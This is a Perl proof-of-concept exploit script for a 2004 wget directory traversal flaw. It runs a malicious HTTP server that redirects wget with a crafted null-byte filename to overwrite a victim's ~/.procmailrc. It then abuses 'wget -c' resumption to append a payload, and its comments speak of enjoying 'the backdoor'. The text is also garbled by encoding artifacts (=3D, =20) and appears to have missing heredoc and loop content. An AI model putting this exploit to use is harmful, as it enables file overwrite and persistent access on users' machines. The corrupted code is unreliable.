#!/usr/bin/perl -W # wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability # # Copyright 2004 Jan Min=C3=A1=C5=99 (jjminar fastmail fm) # License: Public Domain - SECU # # When wget connects to us, we send it a HTTP redirect constructed so that wget # wget will connect the second time, it will be attempting to override # ~/.procm4ilrc (well, provided that the user running wget has username 'jan' # 8-)). use POSIX qw(strftime); # This is our scheme/host/port $server =3D "http://localhost:31340"; # Use this + DNS poisoning with wget 1.9 & CVS #$server =3D "http://.."; # Wanna know who got infected?=20 #$log =3D "/dev/pts/1"; # The filename we will try to overwrite on the target system $filename =3D "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored."; ############### Payload ######################################### $email =3D 'your@mailbox'; $password =3D 'Pmrpuf ner cevzvgvirf'; $payload =3D <$log" if $log; while(){ print LOG $_ if $log; if (/\Q$trick$filename\E/) { #if (/%2f/) { # We see the filename, so this is the second time # they're here. Time to feed the sploit. $second++; } elsif (/^Range: bytes=3D\(33\)-/) { # Appending goes like this: # (1) Tell'em what you're gonna tell'em # (2) Then tell'em just a half # (3) Close it # (4) Wait # (5) They're comin' back, with wget -c # (6) Tell'em the sploit # (7) Close again # (8) Wtf? They're comin' back with wget -c again # (9) Tell'em the rest... # (10) ... enjoying the backdoor at the same time print LOG "File if $1 bytes long\n" if $log; } elsif (/^\r?$/) { # The HTTP headers are over. Let's do it! $date =3D strftime ("%a, %e %b %Y %H:%M:%S %z", localtime); if (!$second) { # Print the payload print <\r EOT } else { # Print the redirection print <